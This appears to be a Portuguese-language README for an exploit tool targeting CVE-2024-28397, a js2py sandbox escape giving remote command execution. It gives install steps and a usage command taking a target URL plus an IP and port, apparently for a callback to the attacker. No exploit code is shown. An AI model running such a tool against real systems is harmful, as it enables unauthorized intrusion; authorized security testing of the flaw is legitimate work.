
js2py <= 0.74 escape de sandbox (CVE-2024-28397)
Exploit para execução remota de comandos (RCE) por meio de escape do sandbox em js2py <= 0.74.
Permite executar código arbitrário no sistema anfitrião através de avaliação de JavaScript insegura.
subprocess.PopenDependências:
pip install -r requirements.txt
python3 exploit.py -U http://target_url -H IP -P PUERTO
Este projeto é fornecido exclusivamente para fins educacionais e para auditorias de segurança autorizadas.
O autor não se responsabiliza pelo uso indevido desta ferramenta.